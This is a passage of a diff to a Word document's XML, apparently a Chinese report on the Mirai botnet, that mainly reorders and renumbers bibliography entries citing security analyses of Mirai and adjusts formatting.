       <w:pPr>
@@ -9140,7 +10717,6 @@
           <w:id w:val="-591092268"/>
           <w:citation/>
         </w:sdtPr>
-        <w:sdtEndPr/>
         <w:sdtContent>
           <w:r>
             <w:rPr>
@@ -9205,7 +10781,7 @@
               <w:sz w:val="24"/>
               <w:szCs w:val="24"/>
             </w:rPr>
-            <w:t>[13]</w:t>
+            <w:t>[15]</w:t>
           </w:r>
           <w:r>
             <w:rPr>
@@ -9301,9 +10877,8 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>博</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
+        <w:t>博主</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
@@ -9311,26 +10886,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>主</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>上线</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>了Mirai及其他僵尸网络的扫描监控系统</w:t>
+        <w:t>上线了Mirai及其他僵尸网络的扫描监控系统</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9426,7 +10982,7 @@
         </w:rPr>
       </w:pPr>
     </w:p>
-    <w:bookmarkStart w:id="12" w:name="_Toc469905254" w:displacedByCustomXml="next"/>
+    <w:bookmarkStart w:id="15" w:name="_Toc472191679" w:displacedByCustomXml="next"/>
     <w:sdt>
       <w:sdtPr>
         <w:rPr>
@@ -9460,14 +11016,13 @@
             </w:rPr>
             <w:t>书目</w:t>
           </w:r>
-          <w:bookmarkEnd w:id="12"/>
+          <w:bookmarkEnd w:id="15"/>
         </w:p>
         <w:sdt>
           <w:sdtPr>
             <w:id w:val="111145805"/>
             <w:bibliography/>
           </w:sdtPr>
-          <w:sdtEndPr/>
           <w:sdtContent>
             <w:p>
               <w:pPr>
@@ -9499,12 +11054,12 @@
                 <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
               </w:tblPr>
               <w:tblGrid>
-                <w:gridCol w:w="417"/>
-                <w:gridCol w:w="7889"/>
+                <w:gridCol w:w="301"/>
+                <w:gridCol w:w="8005"/>
               </w:tblGrid>
               <w:tr>
                 <w:trPr>
-                  <w:divId w:val="2057923878"/>
+                  <w:divId w:val="935603005"/>
                   <w:tblCellSpacing w:w="15" w:type="dxa"/>
                 </w:trPr>
                 <w:tc>
@@ -9540,6 +11095,7 @@
                     <w:pPr>
                       <w:pStyle w:val="a9"/>
                       <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
                         <w:noProof/>
                       </w:rPr>
                     </w:pPr>
@@ -9597,7 +11153,7 @@
               </w:tr>
               <w:tr>
                 <w:trPr>
-                  <w:divId w:val="2057923878"/>
+                  <w:divId w:val="935603005"/>
                   <w:tblCellSpacing w:w="15" w:type="dxa"/>
                 </w:trPr>
                 <w:tc>
@@ -9609,6 +11165,7 @@
                     <w:pPr>
                       <w:pStyle w:val="a9"/>
                       <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
                         <w:noProof/>
                       </w:rPr>
                     </w:pPr>
@@ -9630,6 +11187,7 @@
                     <w:pPr>
                       <w:pStyle w:val="a9"/>
                       <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
                         <w:noProof/>
                       </w:rPr>
                     </w:pPr>
@@ -9689,7 +11247,7 @@
               </w:tr>
               <w:tr>
                 <w:trPr>
-                  <w:divId w:val="2057923878"/>
+                  <w:divId w:val="935603005"/>
                   <w:tblCellSpacing w:w="15" w:type="dxa"/>
                 </w:trPr>
                 <w:tc>
@@ -9701,6 +11259,7 @@
                     <w:pPr>
                       <w:pStyle w:val="a9"/>
                       <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
                         <w:noProof/>
                       </w:rPr>
                     </w:pPr>
@@ -9722,6 +11281,7 @@
                     <w:pPr>
                       <w:pStyle w:val="a9"/>
                       <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
                         <w:noProof/>
                       </w:rPr>
                     </w:pPr>
@@ -9779,7 +11339,7 @@
               </w:tr>
               <w:tr>
                 <w:trPr>
-                  <w:divId w:val="2057923878"/>
+                  <w:divId w:val="935603005"/>
                   <w:tblCellSpacing w:w="15" w:type="dxa"/>
                 </w:trPr>
                 <w:tc>
@@ -9791,6 +11351,7 @@
                     <w:pPr>
                       <w:pStyle w:val="a9"/>
                       <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
                         <w:noProof/>
                       </w:rPr>
                     </w:pPr>
@@ -9812,6 +11373,7 @@
                     <w:pPr>
                       <w:pStyle w:val="a9"/>
                       <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
                         <w:noProof/>
                       </w:rPr>
                     </w:pPr>
@@ -9911,7 +11473,7 @@
               </w:tr>
               <w:tr>
                 <w:trPr>
-                  <w:divId w:val="2057923878"/>
+                  <w:divId w:val="935603005"/>
                   <w:tblCellSpacing w:w="15" w:type="dxa"/>
                 </w:trPr>
                 <w:tc>
@@ -9923,6 +11485,7 @@
                     <w:pPr>
                       <w:pStyle w:val="a9"/>
                       <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
                         <w:noProof/>
                       </w:rPr>
                     </w:pPr>
@@ -9944,6 +11507,7 @@
                     <w:pPr>
                       <w:pStyle w:val="a9"/>
                       <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
                         <w:noProof/>
                       </w:rPr>
                     </w:pPr>
@@ -10029,7 +11593,7 @@
               </w:tr>
               <w:tr>
                 <w:trPr>
-                  <w:divId w:val="2057923878"/>
+                  <w:divId w:val="935603005"/>
                   <w:tblCellSpacing w:w="15" w:type="dxa"/>
                 </w:trPr>
                 <w:tc>
@@ -10041,6 +11605,7 @@
                     <w:pPr>
                       <w:pStyle w:val="a9"/>
                       <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
                         <w:noProof/>
                       </w:rPr>
                     </w:pPr>
@@ -10062,6 +11627,7 @@
                     <w:pPr>
                       <w:pStyle w:val="a9"/>
                       <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
                         <w:noProof/>
                       </w:rPr>
                     </w:pPr>
@@ -10070,7 +11636,21 @@
                         <w:rFonts w:hint="eastAsia"/>
                         <w:noProof/>
                       </w:rPr>
-                      <w:t xml:space="preserve">Wikipedia, </w:t>
+                      <w:t>360</w:t>
+                    </w:r>
+                    <w:r>
+                      <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
+                        <w:noProof/>
+                      </w:rPr>
+                      <w:t>网络安全研究院</w:t>
+                    </w:r>
+                    <w:r>
+                      <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
+                        <w:noProof/>
+                      </w:rPr>
+                      <w:t xml:space="preserve">, </w:t>
                     </w:r>
                     <w:r>
                       <w:rPr>
@@ -10084,7 +11664,21 @@
                         <w:rFonts w:hint="eastAsia"/>
                         <w:noProof/>
                       </w:rPr>
-                      <w:t>Mirai (malware),</w:t>
+                      <w:t xml:space="preserve">Mirai </w:t>
+                    </w:r>
+                    <w:r>
+                      <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
+                        <w:noProof/>
+                      </w:rPr>
+                      <w:t>变种中的</w:t>
+                    </w:r>
+                    <w:r>
+                      <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
+                        <w:noProof/>
+                      </w:rPr>
+                      <w:t>DGA,</w:t>
                     </w:r>
                     <w:r>
                       <w:rPr>
@@ -10098,7 +11692,7 @@
                         <w:rFonts w:hint="eastAsia"/>
                         <w:noProof/>
                       </w:rPr>
-                      <w:t xml:space="preserve"> 12 2016. [</w:t>
+                      <w:t xml:space="preserve"> 9 12 2016. [</w:t>
                     </w:r>
                     <w:r>
                       <w:rPr>
@@ -10112,14 +11706,14 @@
                         <w:rFonts w:hint="eastAsia"/>
                         <w:noProof/>
                       </w:rPr>
-                      <w:t>]. Available: https://en.wikipedia.org/wiki/Mirai_(malware).</w:t>
+                      <w:t>]. Available: http://blog.netlab.360.com/new-mirai-variant-with-dga-chinese-version/.</w:t>
                     </w:r>
                   </w:p>
                 </w:tc>
               </w:tr>
               <w:tr>
                 <w:trPr>
-                  <w:divId w:val="2057923878"/>
+                  <w:divId w:val="935603005"/>
                   <w:tblCellSpacing w:w="15" w:type="dxa"/>
                 </w:trPr>
                 <w:tc>
@@ -10131,6 +11725,7 @@
                     <w:pPr>
                       <w:pStyle w:val="a9"/>
                       <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
                         <w:noProof/>
                       </w:rPr>
                     </w:pPr>
@@ -10152,6 +11747,7 @@
                     <w:pPr>
                       <w:pStyle w:val="a9"/>
                       <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
                         <w:noProof/>
                       </w:rPr>
                     </w:pPr>
@@ -10160,21 +11756,7 @@
                         <w:rFonts w:hint="eastAsia"/>
                         <w:noProof/>
                       </w:rPr>
-                      <w:t>360</w:t>
-                    </w:r>
-                    <w:r>
-                      <w:rPr>
-                        <w:rFonts w:hint="eastAsia"/>
-                        <w:noProof/>
-                      </w:rPr>
-                      <w:t>网络安全研究院</w:t>
-                    </w:r>
-                    <w:r>
-                      <w:rPr>
-                        <w:rFonts w:hint="eastAsia"/>
-                        <w:noProof/>
-                      </w:rPr>
-                      <w:t xml:space="preserve">, </w:t>
+                      <w:t xml:space="preserve">J. Bambenek, </w:t>
                     </w:r>
                     <w:r>
                       <w:rPr>
@@ -10188,7 +11770,7 @@
                         <w:rFonts w:hint="eastAsia"/>
                         <w:noProof/>
                       </w:rPr>
-                      <w:t>Mirai Scanner,</w:t>
+                      <w:t>Mirai Scanning for Port 6789 Looking for New Victims / Now hitting tcp/23231,</w:t>
                     </w:r>
                     <w:r>
                       <w:rPr>
@@ -10216,14 +11798,14 @@
                         <w:rFonts w:hint="eastAsia"/>
                         <w:noProof/>
                       </w:rPr>
-                      <w:t>]. Available: http://data.netlab.360.com/mirai-scanner.</w:t>
+                      <w:t>]. Available: https://isc.sans.edu/forums/diary/UPDATED+x1+Mirai+Scanning+for+Port+6789+Looking+for+New+Victims+Now+hitting+tcp23231/21833/.</w:t>
                     </w:r>
                   </w:p>
                 </w:tc>
               </w:tr>
               <w:tr>
                 <w:trPr>
-                  <w:divId w:val="2057923878"/>
+                  <w:divId w:val="935603005"/>
                   <w:tblCellSpacing w:w="15" w:type="dxa"/>
                 </w:trPr>
                 <w:tc>
@@ -10235,6 +11817,7 @@
                     <w:pPr>
                       <w:pStyle w:val="a9"/>
                       <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
                         <w:noProof/>
                       </w:rPr>
                     </w:pPr>
@@ -10256,6 +11839,7 @@
                     <w:pPr>
                       <w:pStyle w:val="a9"/>
                       <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
                         <w:noProof/>
                       </w:rPr>
                     </w:pPr>
@@ -10264,49 +11848,21 @@
                         <w:rFonts w:hint="eastAsia"/>
                         <w:noProof/>
                       </w:rPr>
-                      <w:t>360</w:t>
-                    </w:r>
-                    <w:r>
-                      <w:rPr>
-                        <w:rFonts w:hint="eastAsia"/>
-                        <w:noProof/>
-                      </w:rPr>
-                      <w:t>网络安全研究院</w:t>
-                    </w:r>
-                    <w:r>
-                      <w:rPr>
-                        <w:rFonts w:hint="eastAsia"/>
-                        <w:noProof/>
-                      </w:rPr>
-                      <w:t xml:space="preserve">, </w:t>
-                    </w:r>
-                    <w:r>
-                      <w:rPr>
-                        <w:rFonts w:hint="eastAsia"/>
-                        <w:noProof/>
-                      </w:rPr>
-                      <w:t>“关于</w:t>
-                    </w:r>
-                    <w:r>
-                      <w:rPr>
-                        <w:rFonts w:hint="eastAsia"/>
-                        <w:noProof/>
-                      </w:rPr>
-                      <w:t xml:space="preserve"> mirai </w:t>
-                    </w:r>
-                    <w:r>
-                      <w:rPr>
-                        <w:rFonts w:hint="eastAsia"/>
-                        <w:noProof/>
-                      </w:rPr>
-                      <w:t>僵尸网络控制主机的数据分析</w:t>
-                    </w:r>
-                    <w:r>
-                      <w:rPr>
-                        <w:rFonts w:hint="eastAsia"/>
-                        <w:noProof/>
-                      </w:rPr>
-                      <w:t>,</w:t>
+                      <w:t xml:space="preserve">Wikipedia, </w:t>
+                    </w:r>
+                    <w:r>
+                      <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
+                        <w:noProof/>
+                      </w:rPr>
+                      <w:t>“</w:t>
+                    </w:r>
+                    <w:r>
+                      <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
+                        <w:noProof/>
+                      </w:rPr>
+                      <w:t>Mirai (malware),</w:t>
                     </w:r>
                     <w:r>
                       <w:rPr>
@@ -10320,7 +11876,7 @@
                         <w:rFonts w:hint="eastAsia"/>
                         <w:noProof/>
                       </w:rPr>
-                      <w:t xml:space="preserve"> 27 10 2016. [</w:t>
+                      <w:t xml:space="preserve"> 12 2016. [</w:t>
                     </w:r>
                     <w:r>
                       <w:rPr>
@@ -10334,14 +11890,14 @@
                         <w:rFonts w:hint="eastAsia"/>
                         <w:noProof/>
                       </w:rPr>
-                      <w:t>]. Available: http://blog.netlab.360.com/a-mirai-botnet-c2-data-analysis/.</w:t>
+                      <w:t>]. Available: https://en.wikipedia.org/wiki/Mirai_(malware).</w:t>
                     </w:r>
                   </w:p>
                 </w:tc>
               </w:tr>
               <w:tr>
                 <w:trPr>
-                  <w:divId w:val="2057923878"/>
+                  <w:divId w:val="935603005"/>
                   <w:tblCellSpacing w:w="15" w:type="dxa"/>
                 </w:trPr>
                 <w:tc>
@@ -10353,6 +11909,7 @@
                     <w:pPr>
                       <w:pStyle w:val="a9"/>
                       <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
                         <w:noProof/>
                       </w:rPr>
                     </w:pPr>
@@ -10361,6 +11918,7 @@
                         <w:rFonts w:hint="eastAsia"/>
                         <w:noProof/>
                       </w:rPr>
+                      <w:lastRenderedPageBreak/>
                       <w:t xml:space="preserve">[9] </w:t>
                     </w:r>
                   </w:p>
@@ -10374,6 +11932,7 @@
                     <w:pPr>
                       <w:pStyle w:val="a9"/>
                       <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
                         <w:noProof/>
                       </w:rPr>
                     </w:pPr>
@@ -10382,7 +11941,14 @@
                         <w:rFonts w:hint="eastAsia"/>
                         <w:noProof/>
                       </w:rPr>
-                      <w:t>绿盟科技</w:t>
+                      <w:t>360</w:t>
+                    </w:r>
+                    <w:r>
+                      <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
+                        <w:noProof/>
+                      </w:rPr>
+                      <w:t>网络安全研究院</w:t>
                     </w:r>
                     <w:r>
                       <w:rPr>
@@ -10396,28 +11962,14 @@
                         <w:rFonts w:hint="eastAsia"/>
                         <w:noProof/>
                       </w:rPr>
-                      <w:t>“德国</w:t>
-                    </w:r>
-                    <w:r>
-                      <w:rPr>
-                        <w:rFonts w:hint="eastAsia"/>
-                        <w:noProof/>
-                      </w:rPr>
-                      <w:t>1127</w:t>
-                    </w:r>
-                    <w:r>
-                      <w:rPr>
-                        <w:rFonts w:hint="eastAsia"/>
-                        <w:noProof/>
-                      </w:rPr>
-                      <w:t>断网事件技术分析与防护方案</w:t>
-                    </w:r>
-                    <w:r>
-                      <w:rPr>
-                        <w:rFonts w:hint="eastAsia"/>
-                        <w:noProof/>
-                      </w:rPr>
-                      <w:t>,</w:t>
+                      <w:t>“</w:t>
+                    </w:r>
+                    <w:r>
+                      <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
+                        <w:noProof/>
+                      </w:rPr>
+                      <w:t>Mirai Scanner,</w:t>
                     </w:r>
                     <w:r>
                       <w:rPr>
@@ -10431,7 +11983,7 @@
                         <w:rFonts w:hint="eastAsia"/>
                         <w:noProof/>
                       </w:rPr>
-                      <w:t xml:space="preserve"> 25 12 2016. [</w:t>
+                      <w:t xml:space="preserve"> [</w:t>
                     </w:r>
                     <w:r>
                       <w:rPr>
@@ -10445,14 +11997,14 @@
                         <w:rFonts w:hint="eastAsia"/>
                         <w:noProof/>
                       </w:rPr>
-                      <w:t>]. Available: http://blog.nsfocus.net/germany-1127-network-events/.</w:t>
+                      <w:t>]. Available: http://data.netlab.360.com/mirai-scanner.</w:t>
                     </w:r>
                   </w:p>
                 </w:tc>
               </w:tr>
               <w:tr>
                 <w:trPr>
-                  <w:divId w:val="2057923878"/>
+                  <w:divId w:val="935603005"/>
                   <w:tblCellSpacing w:w="15" w:type="dxa"/>
                 </w:trPr>
                 <w:tc>
@@ -10464,6 +12016,7 @@
                     <w:pPr>
                       <w:pStyle w:val="a9"/>
                       <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
                         <w:noProof/>
                       </w:rPr>
                     </w:pPr>
@@ -10472,7 +12025,6 @@
                         <w:rFonts w:hint="eastAsia"/>
                         <w:noProof/>
                       </w:rPr>
-                      <w:lastRenderedPageBreak/>
                       <w:t xml:space="preserve">[10] </w:t>
                     </w:r>
                   </w:p>
@@ -10486,6 +12038,7 @@
                     <w:pPr>
                       <w:pStyle w:val="a9"/>
                       <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
                         <w:noProof/>
                       </w:rPr>
                     </w:pPr>
@@ -10515,28 +12068,28 @@
                         <w:rFonts w:hint="eastAsia"/>
                         <w:noProof/>
                       </w:rPr>
-                      <w:t>“</w:t>
-                    </w:r>
-                    <w:r>
-                      <w:rPr>
-                        <w:rFonts w:hint="eastAsia"/>
-                        <w:noProof/>
-                      </w:rPr>
-                      <w:t xml:space="preserve">Mirai </w:t>
-                    </w:r>
-                    <w:r>
-                      <w:rPr>
-                        <w:rFonts w:hint="eastAsia"/>
-                        <w:noProof/>
-                      </w:rPr>
-                      <w:t>变种中的</w:t>
-                    </w:r>
-                    <w:r>
-                      <w:rPr>
-                        <w:rFonts w:hint="eastAsia"/>
-                        <w:noProof/>
-                      </w:rPr>
-                      <w:t>DGA,</w:t>
+                      <w:t>“关于</w:t>
+                    </w:r>
+                    <w:r>
+                      <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
+                        <w:noProof/>
+                      </w:rPr>
+                      <w:t xml:space="preserve"> mirai </w:t>
+                    </w:r>
+                    <w:r>
+                      <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
+                        <w:noProof/>
+                      </w:rPr>
+                      <w:t>僵尸网络控制主机的数据分析</w:t>
+                    </w:r>
+                    <w:r>
+                      <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
+                        <w:noProof/>
+                      </w:rPr>
+                      <w:t>,</w:t>
                     </w:r>
                     <w:r>
                       <w:rPr>
@@ -10550,7 +12103,7 @@
                         <w:rFonts w:hint="eastAsia"/>
                         <w:noProof/>
                       </w:rPr>
-                      <w:t xml:space="preserve"> 9 12 2016. [</w:t>
+                      <w:t xml:space="preserve"> 27 10 2016. [</w:t>
                     </w:r>
                     <w:r>
                       <w:rPr>
@@ -10564,14 +12117,14 @@
                         <w:rFonts w:hint="eastAsia"/>
                         <w:noProof/>
                       </w:rPr>
-                      <w:t>]. Available: http://blog.netlab.360.com/new-mirai-variant-with-dga-chinese-version/.</w:t>
+                      <w:t>]. Available: http://blog.netlab.360.com/a-mirai-botnet-c2-data-analysis/.</w:t>
                     </w:r>
                   </w:p>
                 </w:tc>
               </w:tr>
               <w:tr>
                 <w:trPr>
-                  <w:divId w:val="2057923878"/>
+                  <w:divId w:val="935603005"/>
                   <w:tblCellSpacing w:w="15" w:type="dxa"/>
                 </w:trPr>
                 <w:tc>
@@ -10583,6 +12136,7 @@
                     <w:pPr>
                       <w:pStyle w:val="a9"/>
                       <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
                         <w:noProof/>
                       </w:rPr>
                     </w:pPr>
@@ -10604,6 +12158,7 @@
                     <w:pPr>
                       <w:pStyle w:val="a9"/>
                       <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
                         <w:noProof/>
                       </w:rPr>
                     </w:pPr>
@@ -10612,7 +12167,7 @@
                         <w:rFonts w:hint="eastAsia"/>
                         <w:noProof/>
                       </w:rPr>
-                      <w:t>李东宏</w:t>
+                      <w:t>绿盟科技</w:t>
                     </w:r>
                     <w:r>
                       <w:rPr>
@@ -10626,21 +12181,21 @@
                         <w:rFonts w:hint="eastAsia"/>
                         <w:noProof/>
                       </w:rPr>
-                      <w:t>“</w:t>
-                    </w:r>
-                    <w:r>
-                      <w:rPr>
-                        <w:rFonts w:hint="eastAsia"/>
-                        <w:noProof/>
-                      </w:rPr>
-                      <w:t>Mirai</w:t>
-                    </w:r>
-                    <w:r>
-                      <w:rPr>
-                        <w:rFonts w:hint="eastAsia"/>
-                        <w:noProof/>
-                      </w:rPr>
-                      <w:t>源码分析报告</w:t>
+                      <w:t>“德国</w:t>
+                    </w:r>
+                    <w:r>
+                      <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
+                        <w:noProof/>
+                      </w:rPr>
+                      <w:t>1127</w:t>
+                    </w:r>
+                    <w:r>
+                      <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
+                        <w:noProof/>
+                      </w:rPr>
+                      <w:t>断网事件技术分析与防护方案</w:t>
                     </w:r>
                     <w:r>
                       <w:rPr>
@@ -10661,7 +12216,7 @@
                         <w:rFonts w:hint="eastAsia"/>
                         <w:noProof/>
                       </w:rPr>
-                      <w:t xml:space="preserve"> 13 10 2016. [</w:t>
+                      <w:t xml:space="preserve"> 25 12 2016. [</w:t>
                     </w:r>
                     <w:r>
                       <w:rPr>
@@ -10675,14 +12230,14 @@
                         <w:rFonts w:hint="eastAsia"/>
                         <w:noProof/>
                       </w:rPr>
-                      <w:t>]. Available: http://blog.nsfocus.net/mirai-source-analysis-report/.</w:t>
+                      <w:t>]. Available: http://blog.nsfocus.net/germany-1127-network-events/.</w:t>
                     </w:r>
                   </w:p>
                 </w:tc>
               </w:tr>
               <w:tr>
                 <w:trPr>
-                  <w:divId w:val="2057923878"/>
+                  <w:divId w:val="935603005"/>
                   <w:tblCellSpacing w:w="15" w:type="dxa"/>
                 </w:trPr>
                 <w:tc>
@@ -10694,6 +12249,7 @@
                     <w:pPr>
                       <w:pStyle w:val="a9"/>
                       <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
                         <w:noProof/>
                       </w:rPr>
                     </w:pPr>
@@ -10715,6 +12271,7 @@
                     <w:pPr>
                       <w:pStyle w:val="a9"/>
                       <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
                         <w:noProof/>
                       </w:rPr>
                     </w:pPr>
@@ -10723,7 +12280,14 @@
                         <w:rFonts w:hint="eastAsia"/>
                         <w:noProof/>
                       </w:rPr>
-                      <w:t xml:space="preserve">lennarthaagsma, </w:t>
+                      <w:t>李东宏</w:t>
+                    </w:r>
+                    <w:r>
+                      <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
+                        <w:noProof/>
+                      </w:rPr>
+                      <w:t xml:space="preserve">, </w:t>
                     </w:r>
                     <w:r>
                       <w:rPr>
@@ -10737,7 +12301,21 @@
                         <w:rFonts w:hint="eastAsia"/>
                         <w:noProof/>
                       </w:rPr>
-                      <w:t>Recent vulnerability in Eir D1000 Router used to spread updated version of Mirai DDoS bot,</w:t>
+                      <w:t>Mirai</w:t>
+                    </w:r>
+                    <w:r>
+                      <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
+                        <w:noProof/>
+                      </w:rPr>
+                      <w:t>源码分析报告</w:t>
+                    </w:r>
+                    <w:r>
+                      <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
+                        <w:noProof/>
+                      </w:rPr>
+                      <w:t>,</w:t>
                     </w:r>
                     <w:r>
                       <w:rPr>
@@ -10751,7 +12329,7 @@
                         <w:rFonts w:hint="eastAsia"/>
                         <w:noProof/>
                       </w:rPr>
-                      <w:t xml:space="preserve"> 28 11 2016. [</w:t>
+                      <w:t xml:space="preserve"> 13 10 2016. [</w:t>
                     </w:r>
                     <w:r>
                       <w:rPr>
@@ -10765,14 +12343,14 @@
                         <w:rFonts w:hint="eastAsia"/>
                         <w:noProof/>
                       </w:rPr>
-                      <w:t>]. Available: https://blog.fox-it.com/2016/11/28/recent-vulnerability-in-eir-d1000-router-used-to-spread-updated-version-of-mirai-ddos-bot/.</w:t>
+                      <w:t>]. Available: http://blog.nsfocus.net/mirai-source-analysis-report/.</w:t>
                     </w:r>
                   </w:p>
                 </w:tc>
               </w:tr>
               <w:tr>
                 <w:trPr>
-                  <w:divId w:val="2057923878"/>
+                  <w:divId w:val="935603005"/>
                   <w:tblCellSpacing w:w="15" w:type="dxa"/>
                 </w:trPr>
                 <w:tc>
@@ -10784,6 +12362,7 @@
                     <w:pPr>
                       <w:pStyle w:val="a9"/>
                       <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
                         <w:noProof/>
                       </w:rPr>
                     </w:pPr>
@@ -10805,6 +12384,7 @@
                     <w:pPr>
                       <w:pStyle w:val="a9"/>
                       <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
                         <w:noProof/>
                       </w:rPr>
                     </w:pPr>
@@ -10813,35 +12393,56 @@
                         <w:rFonts w:hint="eastAsia"/>
                         <w:noProof/>
                       </w:rPr>
-                      <w:t xml:space="preserve">Kenzo, </w:t>
-                    </w:r>
-                    <w:r>
-                      <w:rPr>
-                        <w:rFonts w:hint="eastAsia"/>
-                        <w:noProof/>
-                      </w:rPr>
-                      <w:t>“</w:t>
-                    </w:r>
-                    <w:r>
-                      <w:rPr>
-                        <w:rFonts w:hint="eastAsia"/>
-                        <w:noProof/>
-                      </w:rPr>
-                      <w:t>Eir</w:t>
-                    </w:r>
-                    <w:r>
-                      <w:rPr>
-                        <w:rFonts w:hint="eastAsia"/>
-                        <w:noProof/>
-                      </w:rPr>
-                      <w:t>’</w:t>
-                    </w:r>
-                    <w:r>
-                      <w:rPr>
-                        <w:rFonts w:hint="eastAsia"/>
-                        <w:noProof/>
-                      </w:rPr>
-                      <w:t>s D1000 Modem Is Wide Open To Being Hacked,</w:t>
+                      <w:t>匡恩网络</w:t>
+                    </w:r>
+                    <w:r>
+                      <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
+                        <w:noProof/>
+                      </w:rPr>
+                      <w:t xml:space="preserve">, </w:t>
+                    </w:r>
+                    <w:r>
+                      <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
+                        <w:noProof/>
+                      </w:rPr>
+                      <w:t>“北美</w:t>
+                    </w:r>
+                    <w:r>
+                      <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
+                        <w:noProof/>
+                      </w:rPr>
+                      <w:t>DDoS</w:t>
+                    </w:r>
+                    <w:r>
+                      <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
+                        <w:noProof/>
+                      </w:rPr>
+                      <w:t>事件与</w:t>
+                    </w:r>
+                    <w:r>
+                      <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
+                        <w:noProof/>
+                      </w:rPr>
+                      <w:t>IOT</w:t>
+                    </w:r>
+                    <w:r>
+                      <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
+                        <w:noProof/>
+                      </w:rPr>
+                      <w:t>安防监控设备安全</w:t>
+                    </w:r>
+                    <w:r>
+                      <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
+                        <w:noProof/>
+                      </w:rPr>
+                      <w:t>,</w:t>
                     </w:r>
                     <w:r>
                       <w:rPr>
@@ -10855,7 +12456,7 @@
                         <w:rFonts w:hint="eastAsia"/>
                         <w:noProof/>
                       </w:rPr>
-                      <w:t xml:space="preserve"> 7 11 2016. [</w:t>
+                      <w:t xml:space="preserve"> 24 10 2016. [</w:t>
                     </w:r>
                     <w:r>
                       <w:rPr>
@@ -10869,14 +12470,14 @@
                         <w:rFonts w:hint="eastAsia"/>
                         <w:noProof/>
                       </w:rPr>
-                      <w:t>]. Available: https://devicereversing.wordpress.com/2016/11/07/eirs-d1000-modem-is-wide-open-to-being-hacked/.</w:t>
+                      <w:t>]. Available: http://www.kuangn.com/news/industry/detail/458.html.</w:t>
                     </w:r>
                   </w:p>
                 </w:tc>
               </w:tr>
               <w:tr>
                 <w:trPr>
-                  <w:divId w:val="2057923878"/>
+                  <w:divId w:val="935603005"/>
                   <w:tblCellSpacing w:w="15" w:type="dxa"/>
                 </w:trPr>
                 <w:tc>
@@ -10888,6 +12489,7 @@
                     <w:pPr>
                       <w:pStyle w:val="a9"/>
                       <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
                         <w:noProof/>
                       </w:rPr>
                     </w:pPr>
@@ -10909,6 +12511,318 @@
                     <w:pPr>
                       <w:pStyle w:val="a9"/>
                       <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
+                        <w:noProof/>
+                      </w:rPr>
+                    </w:pPr>
+                    <w:r>
+                      <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
+                        <w:noProof/>
+                      </w:rPr>
+                      <w:t>泰格实验室</w:t>
+                    </w:r>
+                    <w:r>
+                      <w:rPr>
